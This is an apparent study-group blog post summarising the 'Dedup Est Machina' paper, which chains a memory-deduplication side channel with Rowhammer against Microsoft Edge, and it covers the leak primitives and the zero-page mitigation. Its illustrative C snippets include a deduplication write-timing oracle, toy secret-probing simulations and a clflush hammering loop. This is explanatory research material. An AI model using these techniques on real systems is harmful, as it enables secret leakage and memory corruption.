Thursday, November 3, 2016

Study Group - Dedup est Machina

The title of the paper is 'Dedup Est Machina: Memory Deduplication as an Advanced Exploitation Vector'.

I saw the paper being presented at the IEEE Security and Privacy Symposium, and it was one of the more enjoyable talks due to the nature of the exploit, and the enthusiasm of Erik Bosman presenting it. It also won a 'PWNIE' award for the 'most innovative research on hacking' at Black Hat USA this year.

The idea of the paper is simple - combine a memory deduplication side channel with a Rowhammer attack.

They use this to craft a JavaScript-based attack against the Microsoft Edge browser, to gain arbitrary memory read and write access in the browser.

Memory Deduplication


The idea is to reduce the total memory footprint of a running system by sharing memory pages with identical content across independent processes.

A good example of this is the page cache in modern operating systems. The page cache stores a single cached copy of file system contents in memory, and shares the copy across different processes.

Memory deduplication goes further: in running processes, two or more pages with the same content in run-time memory are deduplicated even if the pages are completely unrelated and their equivalence is purely fortuitous.

So, in order to keep a single copy of a number of identical pages, the memory deduplication system needs to perform three tasks:
  1. Detect. The system needs to detect memory pages with the same content, usually done at regular and predetermined intervals during normal system operations
  2. Only Keep One. We only want to keep one physical copy, and return the others to the memory allocator; to do this, the deduplication system updates the page-table entries of the owning processes, so that the virtual addresses now point to a single shared copy; these entries are also marked as read-only to support copy-on-write semantics
  3. Create Private Copy on Write. Specifically, when one of the owning processes writes to the read-only page, a copy-on-write page fault occurs; at this point, the memory deduplication system can create a private copy of the page, and map it into the corresponding page table entries of the faulting process
On Windows 8.1 onwards, memory deduplication is known as memory combining.
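Different systems expose this differently: Windows applies memory combining system-wide, while Linux's KSM (kernel same-page merging) only scans pages that a process has explicitly opted in. As a rough illustration of the opt-in side (my own sketch, not code from the paper), here's how two identical anonymous pages could be offered to KSM; if the KSM daemon is running, a later pass may merge them into one read-only copy, with the three steps above happening behind the scenes:

    #include <stdio.h>
    #include <string.h>
    #include <sys/mman.h>

    int main(void) {
        size_t len = 4096;

        /* Two independent anonymous pages filled with identical content. */
        char *a = mmap(NULL, len, PROT_READ | PROT_WRITE,
                       MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        char *b = mmap(NULL, len, PROT_READ | PROT_WRITE,
                       MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        memset(a, 'A', len);
        memset(b, 'A', len);

        /* Ask KSM to consider these ranges for same-page merging
           (needs CONFIG_KSM and /sys/kernel/mm/ksm/run set to 1). */
        if (madvise(a, len, MADV_MERGEABLE) || madvise(b, len, MADV_MERGEABLE))
            perror("madvise");

        /* Once merged, both virtual pages map the same physical frame,
           marked read-only; the first write to either one triggers a
           copy-on-write fault that hands the writer a private copy. */
        a[0] = 'B';
        return 0;
    }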

Memory Deduplication as a Side Channel


So you may have spotted how you could exploit this as a side channel. Writing to a shared page from any of the owning processes results in a page fault and a subsequent page copy.

Due to these additional expensive operations, a write to a shared page takes significantly longer compared to a write to a regular page (by significantly longer, we're talking up to one order of magnitude). This timing difference provides an attacker with a side channel to detect whether a given page exists in the system.

To do this, the attacker has four easy steps:
  1. Craft a page with the exact same content as the target page
  2. Wait for the memory deduplication system to do its thing
  3. Write to the crafted page
  4. Time how long it takes for the write operation to finish
If the write takes longer than a write to a non-deduplicated page, the attacker can conclude that a page with the same content exists.
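As a rough sketch of steps 3 and 4 (my own illustration, assuming a Linux machine with KSM as in the earlier snippet; the wait time and fill values are placeholders), the timing test might look like this. In practice you would repeat the measurement many times to combat noise:

    #include <stdint.h>
    #include <stdio.h>
    #include <string.h>
    #include <sys/mman.h>
    #include <time.h>
    #include <unistd.h>

    /* Time a single one-byte write, in nanoseconds. */
    static uint64_t time_write(volatile char *p) {
        struct timespec t0, t1;
        clock_gettime(CLOCK_MONOTONIC, &t0);
        p[0] = 0x42;                              /* may trigger a CoW fault */
        clock_gettime(CLOCK_MONOTONIC, &t1);
        return (uint64_t)(t1.tv_sec - t0.tv_sec) * 1000000000ULL
             + (uint64_t)(t1.tv_nsec - t0.tv_nsec);
    }

    int main(void) {
        size_t len = 4096;
        char *crafted = mmap(NULL, len, PROT_READ | PROT_WRITE,
                             MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        char *control = mmap(NULL, len, PROT_READ | PROT_WRITE,
                             MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

        memset(crafted, 'A', len);                /* our guess of the target page */
        for (size_t i = 0; i < len; i++)          /* content nothing else should have */
            control[i] = (char)(i * 167 + 13);
        madvise(crafted, len, MADV_MERGEABLE);

        sleep(300);   /* wait out at least one deduplication pass (interval varies) */

        uint64_t t_crafted = time_write(crafted);
        uint64_t t_control = time_write(control);

        /* A crafted write that is much slower than the control write suggests a
           page with the guessed content existed and was merged with ours. */
        printf("crafted: %llu ns  control: %llu ns\n",
               (unsigned long long)t_crafted, (unsigned long long)t_control);
        return 0;
    }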

So just using this, an attacker could detect whether a user was visiting a particular web page, or running a particular program.

Of course, false positives are possible due to noise and other factors, so the attacker can use redundancy (repeated attempts) to disclose the intended information reliably.

At the moment, the memory deduplication side channel is looking a little bit pathetic, as it's a slow single-bit side channel that can only be used for leaking a limited number of bits from a victim process.

However, we can abuse memory deduplication to get some stronger primitives.

Primitives

Primitive #1: Alignment Probing



First up, we have a primitive that allows a byte-by-byte probing of secret information by controlling its alignment in memory. So, this primitive is applicable when the secret data has weak alignment properties.

Imagine that, in this case, the secret is a password stored in memory immediately after a blob of attacker-provided input bytes. What the attacker can do is provide some more input bytes, which effectively push the second part of the secret out of the target page. Now the attacker can brute force the first part of the secret (e.g. one byte) using deduplication.

All the attacker needs to do now is provide fewer input bytes to bring another portion of the secret back into the page. Just like before, the attacker uses deduplication to get the rest of the secret. For larger secrets, you just keep repeating these steps until all of the secret is known.
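To make the loop concrete, here is a toy simulation (my own sketch, not code from the paper): a 64-byte "page", a made-up secret, and a page_exists() stand-in for the write-timing oracle that would be used in a real attack.

    #include <stdbool.h>
    #include <stdio.h>
    #include <string.h>

    #define PAGE 64                          /* tiny "page" for the simulation */

    static const char secret[] = "hunter2";  /* hypothetical victim secret */

    /* Stand-in for the deduplication side channel: does a page with exactly
       this content exist in the victim? Here we just rebuild the victim page
       ourselves; in a real attack this would be the write-timing test. */
    static bool page_exists(const char *guess_page, size_t pad_len) {
        char victim[PAGE];
        memset(victim, 'A', pad_len);                      /* attacker-provided input */
        memcpy(victim + pad_len, secret, PAGE - pad_len);  /* secret bytes that fit */
        return memcmp(victim, guess_page, PAGE) == 0;
    }

    int main(void) {
        char known[sizeof secret] = {0};     /* secret bytes recovered so far */
        size_t recovered = 0;

        /* Start with padding that leaves exactly one secret byte in the page,
           then shrink the padding one byte at a time. */
        for (size_t pad = PAGE - 1; pad >= PAGE - (sizeof secret - 1); pad--) {
            char guess_page[PAGE];
            memset(guess_page, 'A', pad);
            memcpy(guess_page + pad, known, recovered);

            for (int c = 0; c < 256; c++) {  /* brute force the one new byte */
                guess_page[pad + recovered] = (char)c;
                if (page_exists(guess_page, pad)) {
                    known[recovered++] = (char)c;
                    break;
                }
            }
        }
        printf("recovered secret: %.*s\n", (int)recovered, known);
        return 0;
    }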

This alignment probing primitive is apparently very effective, and is used to disclose code pointers in Microsoft Edge, and a password hash in nginx.

Primitive #2: Partial Reuse



When the secret has strong memory alignment properties, the first primitive no longer works.

Up next is a primitive that can be used when attacker-controlled input can partially overwrite stale secret data with predictable reuse properties. User-space memory allocators encourage memory reuse and do not normally zero out deallocated buffers for performance reasons.

This means that a target application often reuses the same memory page and selectively overwrites the content of a reused page with new data.

So, same set-up as before. This time, when the attacker provides a larger input, it overwrites the first part of the stale secret. Now the attacker can brute force the second part using memory deduplication.

Once this is known, the attacker can brute force the first part of the secret by deduplicating against a page whose secret has not been overwritten (where only the first part is now unknown).
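Again as a toy simulation (same caveats as before: a made-up stale secret, a page_exists() stand-in for the timing oracle), the two-phase brute force might look like this. Here the stale secret is four bytes, of which the attacker's input overwrites the first two:

    #include <stdbool.h>
    #include <stdint.h>
    #include <stdio.h>
    #include <string.h>

    #define PAGE 64

    /* Hypothetical stale 4-byte secret sitting at the start of a reused page. */
    static const uint8_t secret[4] = {0xde, 0xad, 0xbe, 0xef};

    /* Stand-in for the timing oracle; 'overwritten' picks which victim page we
       compare against (with or without the attacker's partial overwrite). */
    static bool page_exists(const uint8_t *guess, bool overwritten) {
        uint8_t victim[PAGE] = {0};
        memcpy(victim, secret, 4);
        if (overwritten)
            memset(victim, 'A', 2);          /* attacker input clobbered half of it */
        return memcmp(victim, guess, PAGE) == 0;
    }

    int main(void) {
        uint8_t guess[PAGE] = {0}, found[4] = {0};

        /* Phase 1: against the partially overwritten page only the second half
           of the secret is unknown, so brute force those two bytes. */
        memset(guess, 'A', 2);
        for (int v = 0; v < 0x10000; v++) {
            guess[2] = (uint8_t)(v >> 8); guess[3] = (uint8_t)v;
            if (page_exists(guess, true)) { found[2] = guess[2]; found[3] = guess[3]; break; }
        }

        /* Phase 2: against a page whose secret was never overwritten, the second
           half is now known, so brute force the first half. */
        memset(guess, 0, PAGE);
        guess[2] = found[2]; guess[3] = found[3];
        for (int v = 0; v < 0x10000; v++) {
            guess[0] = (uint8_t)(v >> 8); guess[1] = (uint8_t)v;
            if (page_exists(guess, false)) { found[0] = guess[0]; found[1] = guess[1]; break; }
        }

        printf("recovered: %02x%02x%02x%02x\n", found[0], found[1], found[2], found[3]);
        return 0;
    }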

This primitive is apparently fairly common in practice, and is used in the paper to break heap ASLR (Address Space Layout Randomisation) in nginx.

Primitive #3: Birthday Heap Spray

Last one. This primitive can leak a secret even when the attacker has no control over memory alignment or reuse. It relies on a generative approach that revolves around the birthday paradox, which we all know and love.

This primitive is applicable when the attacker can force the application to controllably spray target secrets over memory.
Up until now we have only assumed there is one secret we want to leak.

If a partially masked secret has $P$ possible values, we use memory deduplication to perform $1 \times P$ comparisons between the $P$ probe pages and the single target page - essentially brute forcing the secret.

For large $P$, a very large amount of memory is required, both for the attack itself and for the redundancy needed to deal with noise. However, if the attacker can cause the target application to generate many secrets, memory deduplication provides a much stronger primitive than brute forcing.

For instance, an attacker can generate a large number of secret heap pointers by creating a large number of objects from JavaScript, each referencing another object.

So, assume the attacker causes the application to generate $S$ such pages, each with a different secret pointer. The attacker now also creates $P$ probe pages, with $P$ being roughly the same size as $S$.

Each probe page uses the same encoding as the secret pages, except that, not knowing the secret pointers, the attacker needs to 'guess' their values. Each probe page contains a different guessed value. The idea is to find at least one of the probe pages matching any of the secret pages. So we have a classic Birthday Problem, where the secret and probe values are the birthdays.
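To see why spraying helps, suppose each secret value is roughly uniform over $N$ possibilities. The chance that none of the $P$ probe values matches any of the $S$ secrets is then roughly (my own back-of-the-envelope estimate, not a formula quoted from the paper)

$$\Pr[\text{no hit}] \approx \left(1 - \frac{S}{N}\right)^{P} \approx e^{-SP/N},$$

so a hit becomes likely once $S \cdot P$ approaches $N$. With $S \approx P \approx \sqrt{N}$, the attacker needs on the order of $\sqrt{N}$ probe pages, rather than the $\approx N$ pages a straight brute force of a single secret would need.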

Since memory deduplication compares any page with any other page in each deduplication pass, it automatically tests all $P$ probe pages against the $S$ target secret pages.

A hit on any of the $P$ probe values immediately exposes a target secret. This birthday primitive reduces the memory requirements of the attack by a factor of $S$. It's especially useful when leaking the location of randomised pointers: for exploitation purposes, it doesn't matter which pointer the attacker hits, as long as at least one of them is hit.

This primitive is used to leak a randomised heap pointer in Microsoft Edge, and also used to craft a reliable Rowhammer exploit.

Rowhammer Exploit

Anyway, now we get to the good bit: the Rowhammer exploit. The Rowhammer bug was first publicly disclosed in June 2014 by Kim et al. However, it was not until March 2015 that Google's Project Zero published a working Linux kernel privilege escalation exploit using Rowhammer.

Essentially, Rowhammer is a DRAM vulnerability that allows an attacker to flip bits in a (victim) memory page by repeatedly reading from other (aggressor) memory pages. These bit flips are deterministic, meaning that once a vulnerable memory location is identified, the same bit flips can be reproduced by reading from the same set of aggressor pages again.

There are two variations of the Rowhammer attack. Single-sided Rowhammer repeatedly activates a single row to corrupt the cells in its neighbouring rows. Double-sided Rowhammer targets a single row by repeatedly activating both of its neighbouring rows. Although double-sided is more effective than single-sided in practice, it requires you to know not only the location of what you want to target, but also which memory maps to the two adjacent rows. Therefore, the authors of this paper chose to use the single-sided Rowhammer attack.

So, if you want to use the Rowhammer attack to do something useful, rather than just corrupting random memory pages, then first you need to find a vulnerable memory location. To do this, you can allocate a large array filled with doubles. If you do it right, each double is encoded such that all of its bits are set to 1, so any bit flip shows up as a changed value when you later read the array back.
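For reference (my own aside, not from the paper): the 64-bit pattern with every bit set decodes as an IEEE-754 NaN with the sign bit set. In C you can construct and inspect it like this:

    #include <stdint.h>
    #include <stdio.h>
    #include <string.h>

    int main(void) {
        uint64_t bits = ~0ULL;           /* 0xffffffffffffffff: all 64 bits set */
        double d;
        memcpy(&d, &bits, sizeof d);     /* reinterpret the bit pattern as a double */
        printf("%f\n", d);               /* typically prints -nan */
        return 0;
    }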

Then, you find some cache eviction sets so you can bypass the CPU caches, and you hammer 32 pages at a time (though the paper doesn't say where the number 32 comes from). By hammer, I mean you read from each page two million times before moving on to the next page. Once you've gone through all 32 pages, you check the entire array for bit flips. After scanning a sufficient number of pages, you will know which bits can be flipped at which offsets.
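The paper drives the hammering from JavaScript and defeats the cache with the eviction sets; as a rough native-code equivalent (my own sketch, using the clflush instruction instead of eviction sets, with the candidate page addresses assumed to be chosen elsewhere), the hammering loop looks something like this:

    #include <emmintrin.h>   /* _mm_clflush */
    #include <stddef.h>
    #include <stdint.h>

    #define READS_PER_PAGE 2000000
    #define PAGES_PER_ROUND 32

    /* Read one address from each candidate aggressor page two million times,
       flushing it from the cache so that every read really goes to DRAM. */
    void hammer_round(volatile uint64_t *pages[PAGES_PER_ROUND]) {
        for (size_t p = 0; p < PAGES_PER_ROUND; p++) {
            for (int i = 0; i < READS_PER_PAGE; i++) {
                (void)*pages[p];                      /* hit the aggressor row */
                _mm_clflush((const void *)pages[p]);  /* force the next read to miss */
            }
        }
        /* After each round, re-scan the big array of all-ones doubles; any value
           that is no longer all ones marks a repeatable bit-flip location. */
    }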

Next, you want to determine what to place in these vulnerable memory locations to craft the exploit. The idea behind the Rowhammer attack in this paper is to place some data in the array which, after a bit flip, yields a reference to a controlled counterfeit object.



So once we know which bit will flip at a vulnerable location, we can store a valid object reference there and let Rowhammer flip it into a reference to our counterfeit object.

So that's the attack - using memory deduplication to leak the code and heap pointers, and Rowhammer to pivot them to a counterfeit object.  In practice, the paper says it takes about 30 minutes for the two deduplication passes and 508MB of memory. It also takes 1GB of memory to find bit flips, and 32MB to find the cache eviction sets. The timing of the Rowhammer depends on the vulnerable DRAM chips, so they say it varies from seconds to hours in practice.


Mitigation

So finally, the last part of the paper talks about how one would prevent attacks like this. The obvious option is to simply not deduplicate at all, as that prevents this whole class of exploits. However, deduplication contributes heavily to using physical memory efficiently, so we would like to keep it if possible.

This paper suggests that you only deduplicate zero pages, i.e. pages whose contents are all zeros (not, despite the name, pages at address zero). The paper doesn't go into much detail about why this is sufficient, but the authors claim their experiments show it's nearly as memory-efficient as full deduplication, while eliminating the possibility of attacks that target memory deduplication.
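If that's the rule, the scanner's eligibility test becomes trivial; something like this (my own illustration of the idea, not the paper's implementation):

    #include <stdbool.h>
    #include <stddef.h>
    #include <stdint.h>

    #define PAGE_SIZE 4096

    /* Under the proposed mitigation, a page is a deduplication candidate
       only if every single byte in it is zero. */
    static bool is_zero_page(const uint8_t *page) {
        for (size_t i = 0; i < PAGE_SIZE; i++)
            if (page[i] != 0)
                return false;
        return true;
    }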

Fin

So that's the end of the paper. They finish by saying memory deduplication is dangerous in the wrong hands, and that they've been working with their contacts at Microsoft to find an immediate solution.

I had a look around on the internet, but no-one has published anything further since the paper, so who knows?
